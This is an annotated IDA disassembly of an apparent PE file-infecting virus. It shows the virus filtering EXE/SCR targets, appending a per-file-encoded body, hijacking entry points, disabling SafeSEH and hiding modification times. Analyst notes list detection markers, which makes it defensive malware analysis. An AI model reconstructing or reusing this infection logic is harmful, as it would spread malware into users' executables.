eax, [eax] sub eax, [edi+0Ch] jb loc_314430C2 cmp eax, [edi+8] jnb loc_314430C2 loc_31442FFE: ; CODE XREF: sub_3144309A+22j add eax, 2 add eax, [edi+14h] add eax, [ebp+1042A4h] push edx push eax push dword ptr [ebp+104304h] call dword ptr [ebp+103E5Eh] pop edx test eax, eax jnz loc_314430D8 jmp loc_314430C2 ; --------------------------------------------------------------------------- loc_31443026: ; CODE XREF: sub_3144309A-11Cj cmp al, 0FFh jnz loc_314430C2 cmp byte ptr [esi], 15h jnz loc_314430C2 mov eax, [esi+1] sub eax, [ebx+34h] push eax call sub_31442404 cmp [ebp+1042E4h], edi jnz short loc_314430C2 add eax, 
[ebp+1042E8h] add eax, [ebp+1042A4h] mov [ebp+104310h], eax mov eax, [eax] cmp eax, [ebp+104308h] jb short loc_3144306F cmp eax, [ebp+10430Ch] jb short loc_314430D8 loc_3144306F: ; CODE XREF: sub_3144309A-35j cmp eax, 70000000h jb short loc_314430AD call sub_3144309A lea ecx, [esi-4] mov eax, ecx sub eax, [edx] add eax, [edx+10h] cmp eax, [ebp+104310h] jnz short locret_31443099 add esp, 10h push dword ptr [ecx] pop [esp-0Ch+arg_24] popa jmp short loc_314430B4 ; --------------------------------------------------------------------------- locret_31443099: ; CODE XREF: sub_3144309A-Fj retn ; END OF FUNCTION CHUNK FOR sub_3144309A ; =============== S U B R O U T I N E ======================================= sub_3144309A proc near ; CODE XREF: sub_3144309A-24p var_8 = dword ptr -8 arg_0 = dword ptr 4 arg_24 = dword ptr 28h ; FUNCTION CHUNK AT 31442F7B SIZE 0000011F BYTES pop dword ptr [ebp+1042C4h] pusha mov esi, [ebp+1042A4h] call sub_3144250B popa loc_314430AD: ; CODE XREF: sub_3144309A-26j test eax, 80000000h jnz short loc_314430C2 loc_314430B4: ; CODE XREF: sub_3144309A-3j sub eax, [edi+0Ch] jb short loc_314430C2 cmp eax, [edi+8] jb loc_31442FFE loc_314430C2: ; CODE XREF: sub_3144309A-F9j ; sub_3144309A-EBj ... dec ecx jnz loc_31442F7B loc_314430C9: ; CODE XREF: sub_31442EE1+9j ; UPX2:31442F63j ... 
mov edi, [esp-4+arg_0] and dword ptr [edi+29B0h], 0FFBFFFFFh jmp short loc_3144311A ; --------------------------------------------------------------------------- loc_314430D8: ; CODE XREF: sub_3144309A-7Fj ; sub_3144309A-2Dj or dword ptr [edx+24h], 0E0000060h dec esi xor eax, eax mov ecx, [esp+8+var_8] xchg eax, [ebp+1042F0h] mov [ebp+1042ECh], eax lea edi, [ecx+29B4h] add eax, [ebp+1042A4h] movsw movsd dec esi sub eax, esi add eax, [edx+14h] sub eax, [edx+0Ch] mov byte ptr [esi-5], 0E8h mov dword ptr [ecx+54h], 5 mov [esi-4], eax loc_3144311A: ; CODE XREF: sub_3144309A+3Cj pop edi pop esi retn sub_3144309A endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3144311D proc near ; CODE XREF: UPX2:3144341Ep ; FUNCTION CHUNK AT 31443247 SIZE 00000002 BYTES push edi call dword ptr [ebp+103EAAh] shr eax, 1Fh jnz loc_31443247 push eax push esp push 28h push 0FFFFFFFFh call dword ptr [ebp+103F0Ah] test eax, eax pop edi js loc_31443247 call sub_3144159F call near ptr loc_31443158+5 push ebx db 65h jz short near ptr unk_31443196 imul ebp, [ebp+53h], 72756365h loc_31443158: ; CODE XREF: sub_3144311D+2Ap imul esi, [ecx+edi*2+41h], 78B5FF00h sub_3144311D endp ; sp-analysis failed inc edx adc [eax], al call dword ptr [ebp+103E5Eh] mov [ebp+104280h], eax call near ptr loc_3144318C+1 push ebx db 65h push esp popa imul esp, [ebp+4Fh], 77h outsb db 65h jb short loc_314431F3 push 72507069h imul esi, [esi+69h], 6567656Ch loc_3144318C: ; CODE XREF: UPX2:3144316Fp add [edi-18h], dl sub eax, ebp ; --------------------------------------------------------------------------- db 0FFh db 0FFh db 0E8h ; db 13h db 0 unk_31443196 db 0 ; CODE XREF: sub_3144311D+30j db 0 db 53h ; S db 65h ; e db 52h ; R db 65h ; e db 73h ; s db 74h ; t db 6Fh ; o db 72h ; r db 65h ; e db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0Bh db 0E8h ; db 0FFh db 0FFh db 0E8h ; db 12h db 
0 db 0 db 0 db 53h ; S db 65h ; e db 42h ; B db 61h ; a db 63h ; c db 6Bh ; k db 75h ; u db 70h ; p db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0EEh ; db 0E7h ; db 0FFh db 0FFh db 0E8h ; db 18h db 0 db 0 db 0 db 53h ; S db 65h ; e db 43h ; C db 68h ; h db 61h ; a db 6Eh ; n db 67h ; g db 65h ; e db 4Eh ; N db 6Fh ; o db 74h ; t db 69h ; i db 66h ; f db 79h ; y db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0CBh ; db 0E7h ; db 0FFh db 0FFh db 50h ; P db 54h ; T ; --------------------------------------------------------------------------- loc_314431F3: ; CODE XREF: UPX2:3144317Dj lea eax, [ebp+103DBCh] push 64h push eax push 1 push edi call dword ptr [ebp+103F16h] mov [esp], edi call dword ptr [ebp+103E52h] sub al, al lea edi, [ebp+104174h] push eax push eax push eax push dword ptr [ebp+103DBCh] push 40001h push esp push 1 push edi call dword ptr [ebp+104280h] push esp push 4 push edi call dword ptr [ebp+104280h] add esp, 14h push dword ptr [ebp+104278h] call dword ptr [ebp+103E8Eh] ; START OF FUNCTION CHUNK FOR sub_3144311D loc_31443247: ; CODE XREF: sub_3144311D+Aj ; sub_3144311D+1Fj pop edi retn ; END OF FUNCTION CHUNK FOR sub_3144311D ; =============== S U B R O U T I N E ======================================= sub_31443249 proc near ; CODE XREF: UPX2:31443417p ; UPX2:31443423p ... 
lea esi, [ebp+104174h] push esi call dword ptr [ebp+103E92h] cmp eax, 0FFFFFFFFh jz locret_3144331A mov [ebp+104284h], eax push 0 push esi call dword ptr [ebp+103ECEh] test eax, eax jz locret_3144331A sub eax, eax push eax push eax push 3 push eax push 1 push 0C0000000h push esi call dword ptr [ebp+103E6Eh] cmp eax, 0FFFFFFFFh jz loc_3144389B mov [ebp+104288h], eax lea ecx, [ebp+10428Ch] lea edx, [ebp+104294h] push ecx push edx push 0 push eax call dword ptr [ebp+103E9Ah] cmp eax, 0FFFFFFFFh jz loc_3144388F push 0 push dword ptr [ebp+104288h] call dword ptr [ebp+103E96h] cmp eax, 0FFFFFFFFh jz loc_3144388F mov [ebp+10429Ch], eax xor ecx, ecx add eax, ebx push ecx push eax push ecx push 4 push ecx push dword ptr [ebp+104288h] call dword ptr [ebp+103E72h] test eax, eax jz loc_3144388F xor ecx, ecx mov [ebp+1042A0h], eax push ecx push ecx push ecx push 0F001Fh push eax call dword ptr [ebp+103EBAh] test eax, eax jz loc_31443867 mov [ebp+1042A4h], eax locret_3144331A: ; CODE XREF: sub_31443249+10j ; sub_31443249+27j ... 
retn sub_31443249 endp ; --------------------------------------------------------------------------- loc_3144331B: ; CODE XREF: sub_3144344B+188p ; sub_3144344B+2A0p mov eax, 7317h mov ecx, [ebx+38h] ; --------------------------------------------------------------------------- db 0F7h ; db 85h ; db 0B0h ; db 39h ; 9 db 10h db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- and [ebp+6], dh add eax, [ebp+101069h] xor edx, edx add eax, ecx div ecx mul ecx mov [ebp+1042B0h], eax mov eax, 29BBh mov ecx, [ebx+3Ch] add eax, [ebp+101069h] xor edx, edx add eax, ecx div ecx mul ecx mov [ebp+1042A8h], eax retn ; =============== S U B R O U T I N E ======================================= sub_31443360 proc near ; CODE XREF: sub_3144344B:loc_314434C0p ; sub_3144344B+1B4p movzx ecx, word ptr [ebx+6] stc loc_31443365: ; CODE XREF: sub_31443360+23j jecxz short locret_3144339C lea edx, [ebx+18h] movzx eax, word ptr [ebx+14h] add edx, eax dec ecx imul eax, ecx, 28h add edx, eax cmp dword ptr [edx], 6E69775Fh stc jz short locret_3144339C cmp dword ptr [edx+0Ch], 1 jb short loc_31443365 mov ecx, [ebx+3Ch] mov eax, [edx+14h] add eax, [edx+10h] lea eax, [eax+ecx*2-1] neg ecx and eax, ecx cmp eax, [ebp+10429Ch] locret_3144339C: ; CODE XREF: sub_31443360:loc_31443365j ; sub_31443360+1Dj ... 
; ---------------------------------------------------------------------------
; Analyst overview (review notes; instructions and data are unchanged).
; All data references use [ebp+10xxxxh]: ebp is a position delta rebuilt by
; "call $+5 / pop ebp / sub ebp, 10343Fh" below, which yields 31340000h at
; the listed load address, so [ebp+101000h] is loc_31441000.
; In order, this excerpt holds:
;   - the last two lines of sub_31443360 (its body is above this excerpt)
;   - sub_3144339D, an exception-handler tail that rewrites a saved Eip
;   - a file-name filter and the driver that calls sub_3144344B
;   - sub_3144344B, which checks and rewrites a PE image in memory
;   - sub_3144384E, cleanup for the file being processed
;   - a start-up stub with a byte-wise XOR decoding loop
;   - data: the name \BaseNamedObjects\VtSect and a table of API addresses
; Values called out below (VtSect name, TimeDateStamp 0A0A0A0A0h, flag bits
; 0E0000060h, zeroed CheckSum) are the items most useful for detection
; signatures and for triage of modified files.
; ---------------------------------------------------------------------------
                retn
sub_31443360    endp


; =============== S U B R O U T I N E =======================================

; note: sub_3144339D - tail of the exception handler used by sub_3144344B.
; It is entered by the call at 31443435, which is itself the handler address
; registered by sub_3144344B. On entry [esp] is the address after that call
; and [esp+10h] is the handler's third argument - presumably the CONTEXT
; pointer (offset 0B8h is Eip in the x86 CONTEXT). The pop stores the return
; address as the resume address; retn then goes back to the exception
; dispatcher with eax = 0 (ExceptionContinueExecution), so execution resumes
; at the "call $+5" after the handler entry. TODO confirm in a debugger.

sub_3144339D    proc near               ; CODE XREF: UPX2:31443435p

arg_C           = dword ptr 10h

                mov     edx, [esp+arg_C]
                xor     eax, eax
                pop     dword ptr [edx+0B8h]
                retn
sub_3144339D    endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; note: file-name filter. The entry point is the unlabeled "lea" below (IDA
; recorded no xref to it). Bytes are copied from [esi] to the buffer at
; [ebp+104174h] with a-z folded to upper case. ebx tracks the byte after the
; last '\' and ecx the byte after the last '.' seen since that '\'.

loc_314433AA:                           ; CODE XREF: UPX2:314433CBj
                mov     ecx, edi
                jmp     short loc_314433B9
; ---------------------------------------------------------------------------
                lea     edi, [ebp+104174h]
                cld

loc_314433B5:                           ; CODE XREF: UPX2:314433C7j
                mov     ebx, edi
                xor     ecx, ecx

loc_314433B9:                           ; CODE XREF: UPX2:314433ACj
                                        ; UPX2:314433CFj
                lodsb
                cmp     al, 61h         ; 'a'
                jb      short loc_314433C4
                cmp     al, 7Ah         ; 'z'
                ja      short loc_314433C4
                sub     al, 20h         ; to upper case

loc_314433C4:                           ; CODE XREF: UPX2:314433BCj
                                        ; UPX2:314433C0j
                stosb
                cmp     al, 5Ch         ; '\': new path component
                jz      short loc_314433B5
                cmp     al, 2Eh         ; '.': remember extension start
                jz      short loc_314433AA
                cmp     al, 0
                jnz     short loc_314433B9
                jecxz   short locret_3144339C ; no '.' in the last component: return
                mov     eax, [ecx]
                cmp     eax, 455845h    ; "EXE",0
                jz      short loc_314433E7
                cmp     eax, 524353h    ; "SCR",0
                jnz     locret_3144331A

; note: names whose first four characters match one of the values below are
; left alone (little-endian ASCII shown on each line).
loc_314433E7:                           ; CODE XREF: UPX2:314433DAj
                mov     eax, [ebx]
                cmp     eax, 434E4957h  ; "WINC"
                jz      locret_3144331A
                cmp     eax, 4E554357h  ; "WCUN"
                jz      locret_3144331A
                cmp     eax, 32334357h  ; "WC32"
                jz      locret_3144331A
                cmp     eax, 4F545350h  ; "PSTO"
                jz      locret_3144331A
; note: sub_31443249 and sub_3144311D are outside this excerpt; only the
; zero flag left by sub_31443249 is consumed here.
                xor     ebx, ebx
                call    sub_31443249
                jnz     short loc_3144342E
                call    sub_3144311D
                call    sub_31443249
                jz      locret_3144331A

; note: edx = 0, so the first instructions of sub_3144344B (push fs:[edx] /
; mov fs:[edx], esp) link an exception registration whose handler field is
; the return address pushed by this call, i.e. the "call sub_3144339D" line.
; As listed, sub_3144344B never returns here: it pops that address and falls
; through into sub_3144384E. The lines after the call run only via exception
; dispatch: they rebuild ebp and go to the common exit loc_31443845.
loc_3144342E:                           ; CODE XREF: UPX2:3144341Cj
                xor     edx, edx
                call    sub_3144344B
                call    sub_3144339D
                call    $+5
                pop     ebp
                sub     ebp, 10343Fh
                jmp     loc_31443845

; =============== S U B R O U T I N E =======================================

; note: sub_3144344B - validate the PE image whose base is at [ebp+1042A4h],
; then rewrite its headers and write 29BCh bytes taken from [ebp+101000h]
; into it, encoded with a per-file byte key.
; In:  edx = 0 (addresses fs:[0]); ebp = position delta.
; Out: none used by the visible caller; every path ends at loc_31443845.
; Helpers sub_31442404, sub_31443360 (body), sub_31442EE1, loc_31442845,
; loc_3144331B and dword_31441B40+43h are outside this excerpt, so remarks
; about them are inferred from how their results are used.

sub_3144344B    proc near               ; CODE XREF: UPX2:31443430p

var_14          = dword ptr -14h

                push    dword ptr fs:[edx]
                mov     esi, [ebp+1042A4h]
                mov     fs:[edx], esp
                cmp     word ptr [esi], 5A4Dh ; "MZ"
                jnz     loc_31443845
                mov     ebx, [esi+3Ch]  ; e_lfanew
                add     ebx, esi
                cmp     word ptr [ebx], 4550h ; "PE"
                jnz     loc_31443845
                test    dword ptr [ebx+16h], 2000h ; Characteristics bit 2000h (DLL): skip
                jnz     loc_31443845
                test    byte ptr [ebx+5Ch], 2 ; Subsystem needs bit 1 set (2 = GUI, 3 = console)
                jz      loc_31443845
; note: [ebx+8] is the file header TimeDateStamp. 0A0A0A0A0h is the value
; this routine itself writes further down, so it works as an "already
; processed" marker; where 20202020h comes from is not visible here.
                mov     eax, [ebx+8]
                cmp     eax, 0A0A0A0A0h
                jz      loc_31443845
                cmp     eax, 20202020h
                jz      loc_31443845
; note: [ebx+0C8h] is the RVA field of PE32 data directory 10 (load config).
; NOTE(review): if ecx ends up addressing that directory in the mapped file,
; offsets 40h/44h are SEHandlerTable/SEHandlerCount, i.e. the image's SafeSEH
; table is blanked - confirm what sub_31442404 and [ebp+1042E8h] provide.
                mov     ecx, [ebx+0C8h]
                jecxz   short loc_314434C0
                push    ecx
                call    sub_31442404
                add     ecx, [ebp+1042E8h]
                add     ecx, esi
                and     dword ptr [ecx+40h], 0
                and     dword ptr [ecx+44h], 0

; note: sub_31443360 reports failure in CF and leaves a record pointer in
; edx. The offsets used on edx (+8, +0Ch, +10h, +14h, +24h) line up with
; IMAGE_SECTION_HEADER VirtualSize, VirtualAddress, SizeOfRawData,
; PointerToRawData and Characteristics - presumably the last section.
loc_314434C0:                           ; CODE XREF: sub_3144344B+5Dj
                call    sub_31443360
                jb      loc_31443845
                and     dword ptr [ebp+1042ECh], 0
; eax = max(0, [edx+8] - [edx+10h]); when not below, [edx+10h] is raised to [edx+8]
                mov     eax, [edx+8]
                mov     ecx, [edx+10h]
                sub     eax, ecx
                jnb     short loc_314434E0
                xor     eax, eax
                jmp     short loc_314434E5
; ---------------------------------------------------------------------------

loc_314434E0:                           ; CODE XREF: sub_3144344B+8Fj
                add     ecx, eax
                mov     [edx+10h], ecx

; note: dword_31441B40+43h is code inside an item IDA typed as data. From
; its use it looks like a bounded random-number helper (limit in eax, result
; in edx) - not verifiable from this excerpt. Its result perturbs the two
; key bytes at [ebp+1039AEh] / [ebp+1039AFh].
loc_314434E5:                           ; CODE XREF: sub_3144344B+93j
                mov     [ebp+1042ACh], eax
                add     ecx, [edx+0Ch]
                mov     eax, 10000h
                push    ecx
                call    near ptr dword_31441B40+43h
                xor     [ebp+1039AEh], dl
                mov     cl, 20h
                xor     [ebp+1039AFh], dh

; note: for cl = 1Fh down to 0, calls the helper with eax = 20h and XORs a
; value shifted left by cl into the option dword at [ebp+1039B0h]. That dword
; selects the variants tested throughout the rest of this routine.
loc_31443507:                           ; CODE XREF: sub_3144344B+D5j
                push    20h
                dec     cl
                pop     eax
                js      short loc_31443522
                call    near ptr dword_31441B40+43h
                test    edx, edx
                setz    dl
                shl     edx, cl
                xor     [ebp+1039B0h], edx
                jmp     short loc_31443507
; ---------------------------------------------------------------------------

; note: option clean-up. With bit 2000000h set: if bits 0-1 are both clear,
; bit 8000000h is cleared; otherwise bit 10000000h is set.
loc_31443522:                           ; CODE XREF: sub_3144344B+C1j
                test    dword ptr [ebp+1039B0h], 2000000h
                jz      short loc_31443550
                test    dword ptr [ebp+1039B0h], 3
                jnz     short loc_31443546
                and     dword ptr [ebp+1039B0h], 0F7FFFFFFh
                jmp     short loc_31443550
; ---------------------------------------------------------------------------

loc_31443546:                           ; CODE XREF: sub_3144344B+EDj
                or      dword ptr [ebp+1039B0h], 10000000h

; note: shuffles the byte table at [ebp+1039A8h] (six swaps of byte 0 with a
; helper-chosen index) and repeats the shuffle until the checks below on
; bytes 1039A8h-1039AAh pass for the selected option bits.
loc_31443550:                           ; CODE XREF: sub_3144344B+E1j
                                        ; sub_3144344B+F9j ...
                push    6
                pop     ecx

loc_31443556:                           ; CODE XREF: sub_3144344B+129j
                push    6
                pop     eax
                call    near ptr dword_31441B40+43h
                mov     al, [ebp+1039A8h]
                xchg    al, [edx+ebp+1039A8h]
                mov     [ebp+1039A8h], al
                loop    loc_31443556
                test    dword ptr [ebp+1039B0h], 8
                jnz     short loc_3144358B
                cmp     byte ptr [ebp+1039AAh], 1
                jz      short loc_31443550

loc_3144358B:                           ; CODE XREF: sub_3144344B+135j
                test    dword ptr [ebp+1039B0h], 10000000h
                jz      short loc_314435B2
                cmp     byte ptr [ebp+1039A8h], 5
                jz      short loc_31443550
                cmp     byte ptr [ebp+1039A9h], 5
                jz      short loc_31443550
                cmp     byte ptr [ebp+1039AAh], 5
                jz      short loc_31443550

loc_314435B2:                           ; CODE XREF: sub_3144344B+14Aj
                test    dword ptr [ebp+1039B0h], 400000h
                jz      short loc_314435C7
                cmp     byte ptr [ebp+1039A8h], 2
                ja      short loc_31443550

; note: sub_3144384E releases the current file state; sub_31443249 is then
; called again with ebx = [ebp+1042A8h] + [ebp+1042ACh]. NOTE(review):
; presumably this reopens the file with room for the added bytes - confirm
; in sub_31443249. The MZ/PE pointers are re-derived afterwards.
loc_314435C7:                           ; CODE XREF: sub_3144344B+171j
                and     dword ptr [ebp+1042F0h], 0
                call    loc_31442845
                call    loc_3144331B
                call    sub_3144384E
                mov     ebx, [ebp+1042A8h]
                add     ebx, [ebp+1042ACh]
                call    sub_31443249
                jz      loc_31443845
                mov     esi, [ebp+1042A4h]
                mov     ebx, [esi+3Ch]
                add     ebx, esi
                call    sub_31443360
                jb      loc_31443845
; note: sets bits 0E0000060h in [edx+24h]. Read as section Characteristics
; that is code + initialized data + execute + read + write; a section that
; is both writable and executable is a useful triage signal.
                or      dword ptr [edx+24h], 0E0000060h
; write cursor edi = base + [edx+14h] + [edx+10h] (end of the record's raw data)
                mov     edi, esi
                push    edx
                push    esi
                add     edi, [edx+14h]
                add     edi, [edx+10h]
                test    dword ptr [ebp+1039B0h], 20000000h
                jnz     short loc_3144363B
; bit 20000000h clear: [ebp+101069h] bytes from [ebp+1039BCh] are written first
                mov     [ebp+1042F4h], edi
                lea     esi, [ebp+1039BCh]
                mov     ecx, [ebp+101069h]
                rep movsb

; note: copies 0A6Fh dwords (29BCh bytes) starting at [ebp+101000h]. ecx is
; zero after rep movsd, so the jecxz is always taken and the trailing
; rep movsb never runs.
loc_3144363B:                           ; CODE XREF: sub_3144344B+1DAj
                push    edi
                mov     ecx, 0A6Fh
                lea     esi, [ebp+101000h]
                rep movsd
                mov     cl, 0
                jecxz   short loc_3144364F
                rep movsb

; note: variant taken when option bit 20000000h is set. It works on a second
; record at [ebp+1042E4h], looked up from AddressOfEntryPoint ([ebx+28h]) by
; sub_31442404 - presumably the section that contains the entry point.
loc_3144364F:                           ; CODE XREF: sub_3144344B+200j
                test    dword ptr [ebp+1039B0h], 20000000h
                jz      loc_3144370D
                push    dword ptr [ebx+28h]
                call    sub_31442404
                mov     edx, [ebp+1042E4h]
                test    edx, edx
                jz      loc_3144370D
                mov     esi, [ebp+1042A4h]
                mov     ecx, [edx+10h]
                or      dword ptr [edx+24h], 0E0000060h
                sub     ecx, [edx+8]
                jnb     short loc_3144368C
                xor     ecx, ecx

; ecx = max(0, [edx+10h] - [edx+8]) is compared with the length at [ebp+101069h]
loc_3144368C:                           ; CODE XREF: sub_3144344B+23Dj
                add     esi, [edx+14h]
                cmp     ecx, [ebp+101069h]
                mov     ecx, [ebp+101069h]
                jb      short loc_314436F3
                mov     edi, [esp+14h+var_14] ; top of stack: start of the 29BCh-byte copy
                and     dword ptr [ebp+101069h], 0
                and     dword ptr [edi+69h], 0
                mov     edi, [edx+8]
                add     [edx+8], ecx
                add     esi, edi
                xchg    esi, edi
                mov     eax, [ebp+1042B8h]
                test    dword ptr [ebp+1039B0h], 40h
                jz      short loc_314436CC
                neg     dword ptr [eax]

loc_314436CC:                           ; CODE XREF: sub_3144344B+27Dj
                add     esi, [edx+0Ch]
                sub     [eax], esi
                mov     [ebp+1042F0h], esi
                mov     esi, [ebx+28h]
                add     [eax], esi
                test    dword ptr [ebp+1039B0h], 40h
                jz      short loc_314436EA
                neg     dword ptr [eax]

loc_314436EA:                           ; CODE XREF: sub_3144344B+29Bj
                push    ecx
                call    loc_3144331B
                pop     ecx
                jmp     short loc_314436FF
; ---------------------------------------------------------------------------

loc_314436F3:                           ; CODE XREF: sub_3144344B+250j
                add     esi, [ebx+28h]
                sub     esi, [edx+0Ch]
                push    ecx
                push    esi
                rep movsb
                pop     edi
                pop     ecx

loc_314436FF:                           ; CODE XREF: sub_3144344B+2A6j
                lea     esi, [ebp+1039BCh]
                mov     [ebp+1042F4h], edi
                rep movsb

; note: edi/esi are restored to the start of the 29BCh-byte copy and the
; image base. rdtsc supplies a per-run value: a 16-bit word derived from the
; low TSC dword (multiplied by 12345678h only when its low byte equals the
; key byte) is stored at offset 11Eh (137h - 19h) of the copy.
loc_3144370D:                           ; CODE XREF: sub_3144344B+20Ej
                                        ; sub_3144344B+224j
                pop     edi
                pop     esi
                rdtsc
                xchg    eax, edx
                lea     eax, [edi+137h]
                cmp     dl, [ebp+1039AEh]
                jnz     short loc_31443726
                imul    edx, 12345678h

loc_31443726:                           ; CODE XREF: sub_3144344B+2D3j
                mov     [eax-19h], dx
; NOTE(review): the call target lies inside bytes IDA decoded as
; locret_3144111E; it cannot be analysed from this excerpt.
                call    near ptr locret_3144111E+2
                pop     edx
; ecx = [edx+0Ch] + [edx+10h]: RVA-style position of the written bytes
                mov     ecx, [edx+0Ch]
                add     ecx, [edx+10h]
                test    dword ptr [ebp+1039B0h], 20000000h
                lea     eax, [ecx+5]
                jnz     short loc_31443758
                mov     [ebp+1042F0h], ecx
                add     eax, [ebp+101069h]
                and     dword ptr [edi+69h], 0

; note: stores (position + 5 [+ prefix length]) - AddressOfEntryPoint at
; offset 54h of the copy; presumably the displacement the copied code uses
; to hand control back to the original entry point - confirm at 31441054.
loc_31443758:                           ; CODE XREF: sub_3144344B+2F8j
                sub     eax, [ebx+28h]
                mov     [edi+54h], eax
                test    dword ptr [ebp+103F6Ch], 1
                jz      short loc_31443774
                mov     dword ptr [ebx+8], 0A0A0A0A0h ; TimeDateStamp := marker tested at entry

loc_31443774:                           ; CODE XREF: sub_3144344B+320j
                test    dword ptr [ebp+1039B0h], 400000h
                jz      short loc_31443787
                push    edx
                call    sub_31442EE1
                pop     edx

; note: when [ebp+1042F0h] is non-zero it replaces AddressOfEntryPoint
; ([ebx+28h]). Otherwise ecx becomes [ebp+1042ECh], or the unchanged entry
; point if that is zero too.
loc_31443787:                           ; CODE XREF: sub_3144344B+333j
                mov     ecx, [ebp+1042F0h]
                jecxz   short loc_31443794
                mov     [ebx+28h], ecx
                jmp     short loc_314437A1
; ---------------------------------------------------------------------------

loc_31443794:                           ; CODE XREF: sub_3144344B+342j
                mov     ecx, [ebp+1042ECh]
                jecxz   short loc_3144379E
                jmp     short loc_314437A1
; ---------------------------------------------------------------------------

loc_3144379E:                           ; CODE XREF: sub_3144344B+34Fj
                mov     ecx, [ebx+28h]

loc_314437A1:                           ; CODE XREF: sub_3144344B+347j
                                        ; sub_3144344B+351j
                test    dword ptr [ebp+1039B0h], 3
                jz      short loc_314437C1
                mov     eax, [ebp+1042F4h]
                add     ecx, [ebp+1042DCh]
                add     eax, [ebp+1042D8h]
                add     [eax], ecx

; note: header fix-ups. [edx+8] is raised to at least [edx+10h], both are
; grown by the sizes at [ebp+1042A8h] / [ebp+1042B0h], the optional-header
; CheckSum ([ebx+58h]) is zeroed and SizeOfImage ([ebx+50h]) is increased.
loc_314437C1:                           ; CODE XREF: sub_3144344B+360j
                mov     ecx, [edx+10h]
                mov     eax, [ebp+1042A8h]
                cmp     [edx+8], ecx
                jnb     short loc_314437D2
                mov     [edx+8], ecx

loc_314437D2:                           ; CODE XREF: sub_3144344B+382j
                add     [edx+10h], eax
                and     dword ptr [ebx+58h], 0
                mov     eax, [ebp+1042B0h]
                push    29BCh
                add     [edx+8], eax
                pop     ecx             ; ecx = 29BCh bytes to encode
                add     [ebx+50h], eax
                mov     dl, [ebp+1039AEh] ; dl = starting key byte
                test    dword ptr [ebp+1039B0h], 20000000h
                jz      short loc_31443803
                add     ecx, [ebp+101069h]

; dh = key step: 0 with bit 20000h, else 1 with bit 40000h, else [ebp+1039AFh]
loc_31443803:                           ; CODE XREF: sub_3144344B+3B0j
                mov     dh, 0
                test    dword ptr [ebp+1039B0h], 20000h
                jnz     short loc_31443825
                inc     dh
                test    dword ptr [ebp+1039B0h], 40000h
                jnz     short loc_31443825
                mov     dh, [ebp+1039AFh]

; note: in-place encoding of the copied bytes at edi: each byte is combined
; with dl (ADD when bit 4000h is clear, XOR when set) and dl advances by dh.
; The written body therefore differs per file; static signatures should
; target the header markers or a decoder stub rather than the body bytes.
loc_31443825:                           ; CODE XREF: sub_3144344B+3C4j
                                        ; sub_3144344B+3D2j
                test    dword ptr [ebp+1039B0h], 4000h
                jnz     short loc_3144383C

loc_31443831:                           ; CODE XREF: sub_3144344B+3EDj
                mov     al, [edi]
                add     al, dl
                stosb
                add     dl, dh
                loop    loc_31443831
                jmp     short loc_31443845
; ---------------------------------------------------------------------------

loc_3144383C:                           ; CODE XREF: sub_3144344B+3E4j
                                        ; sub_3144344B+3F8j
                mov     al, [edi]
                xor     al, dl
                stosb
                add     dl, dh
                loop    loc_3144383C

; note: common exit. esp is reloaded from fs:[0] (the registration linked at
; entry), the previous registration is restored, and the handler address is
; popped. There is no retn: execution continues into sub_3144384E.
loc_31443845:                           ; CODE XREF: UPX2:31443446j
                                        ; sub_3144344B+11j ...
                xor     edx, edx
                mov     esp, fs:[edx]
                pop     dword ptr fs:[edx]
                pop     eax
sub_3144344B    endp ; sp-analysis failed


; =============== S U B R O U T I N E =======================================

; note: sub_3144384E - cleanup for the file being processed; does nothing
; when [ebp+104288h] is zero. All calls go through the address table that
; follows the VtSect string. By offset arithmetic on this listing,
; [ebp+103E52h] is the first table slot (7C809B47h, labelled
; KERNEL32.CloseHandle in the import list at the top of the file).
; NOTE(review): the other three slots cannot be named from this page. Their
; argument shapes match UnmapViewOfFile(base), SetFileTime(handle, NULL,
; &t1, &t2) and SetFileAttributesA(path, attrs) - confirm. If so, timestamps
; and attributes are put back after the write, so file times are not
; reliable evidence of modification.
; loc_31443867 / loc_3144388F / loc_3144389B are entered from sub_31443249.

sub_3144384E    proc near               ; CODE XREF: sub_3144344B+18Dp
                cmp     dword ptr [ebp+104288h], 0
                jz      locret_3144331A
                push    dword ptr [ebp+1042A4h]
                call    dword ptr [ebp+103EDEh]

loc_31443867:                           ; CODE XREF: sub_31443249+C5j
                push    dword ptr [ebp+1042A0h]
                call    dword ptr [ebp+103E52h]
                lea     ecx, [ebp+10428Ch]
                lea     edx, [ebp+104294h]
                push    ecx
                push    edx
                push    0
                push    dword ptr [ebp+104288h]
                call    dword ptr [ebp+103ED2h]

loc_3144388F:                           ; CODE XREF: sub_31443249+6Bj
                                        ; sub_31443249+82j ...
                push    dword ptr [ebp+104288h]
                call    dword ptr [ebp+103E52h]

loc_3144389B:                           ; CODE XREF: sub_31443249+45j
                lea     esi, [ebp+104174h] ; path buffer filled by the file-name filter
                push    dword ptr [ebp+104284h]
                push    esi
                call    dword ptr [ebp+103ECEh]
                and     dword ptr [ebp+104288h], 0
                retn
sub_3144384E    endp

; ---------------------------------------------------------------------------
; note: IDA left the following bytes as data; they are reproduced unchanged
; and are not analysed here.
                dw 0E8h
                dd 5D000000h, 0ED81016Ah, 1038BBh, 0C10FF058h, 10157885h
                dd 0C3C08500h, 0F0FFC883h, 7885C10Fh, 0C3001015h, 2A00103Dh
                dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
                dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
                dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104174B5h
                dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
                dd 0FF505200h, 103F1E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
                dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h
                dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h
